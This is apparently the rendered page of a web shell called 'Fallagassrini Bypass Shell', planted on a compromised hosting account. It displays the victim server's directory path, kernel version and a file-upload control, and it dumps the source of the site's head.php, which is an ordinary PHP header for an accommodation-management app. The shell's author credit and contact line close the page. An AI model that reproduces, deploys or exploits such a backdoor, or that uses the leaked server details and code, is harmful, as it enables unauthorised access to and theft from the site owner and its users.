Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/myreco.online/administration/gestion/includes/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/myreco.online/administration/gestion/includes/head.php

	<?
	
	$token 						= $db->escape($_REQUEST['token']);
	if (!$token) {exit;}
	$heb = $db->get_row("SELECT * FROM heb WHERE token = '" . $db->escape($token) . "'");
	if (!$heb) {exit;}
	
	$hebergement_nom	= $heb->name;
	$hebergement_ville	= $heb->city;
	$hebergement_pays	= $heb->country_code;
	
	// Si langue passée en GET → la mémoriser en session
	if (isset($_GET['lang']) && in_array($_GET['lang'], $langues)) {
		$_SESSION['langue'] = $_GET['lang'];
	}

	// Sinon, si aucune langue en session, utiliser celle du pays de la fiche
	if (!isset($_SESSION['langue'])) {
		$_SESSION['langue'] = strtoupper($heb->country_code);
	}
	
	// Sinon, si aucune langue en session, utiliser FR
	if (!$_SESSION['langue']) {
		$_SESSION['langue'] = 'FR';
	}

	$langue_active = $_SESSION['langue'];
	$trad = chargerTraductions($langue_active);?>
	<head>
	<base href="">
	<meta charset="utf-8" />
	<title><?echo $titre_application;?></title>
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700" />
	<!--begin::Page Vendors Styles(used by this page)-->
	<link href="../assets/plugins/custom/datatables/datatables.bundle.css" rel="stylesheet" type="text/css" />
	<!--end::Page Vendors Styles-->

	<!--begin::Global Theme Styles(used by all pages)-->
	<link href="../assets/plugins/global/plugins.bundle.css" rel="stylesheet" type="text/css" />
	<link href="../assets/plugins/custom/prismjs/prismjs.bundle.css" rel="stylesheet" type="text/css" />
	<link href="../assets/css/style.bundle.css" rel="stylesheet" type="text/css" />
	<!--end::Global Theme Styles-->

	<!--begin::Layout Themes(used by all pages)-->
	<link href="../assets/css/themes/layout/header/base/light.css" rel="stylesheet" type="text/css" />
	<link href="../assets/css/themes/layout/header/menu/light.css" rel="stylesheet" type="text/css" />
	<link href="../assets/css/themes/layout/brand/light.css" rel="stylesheet" type="text/css" />
	<link href="../assets/css/themes/layout/aside/light.css" rel="stylesheet" type="text/css" />
	<?if($_SESSION['theme_sombre']=="oui") {?>
	<link href="../assets/css/themes/layout/brand/dark.css" rel="stylesheet" type="text/css" />
	<link href="../assets/css/themes/layout/aside/dark.css" rel="stylesheet" type="text/css" />
	<?}?>
	<!--end::Layout Themes-->

	<!--end::Layout Themes-->
	<link href="../css/custom.css" rel="stylesheet" type="text/css" />
	<style type="text/css" class="init">#<?echo $datatable_nom;?> tbody tr:hover {background-color:<?echo $couleur_secondaire;?> !important;}</style>
	<link rel="shortcut icon" href="<?echo $icone;?>" />
	<link href="../css/custom.css" rel="stylesheet" type="text/css" />
	</head>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net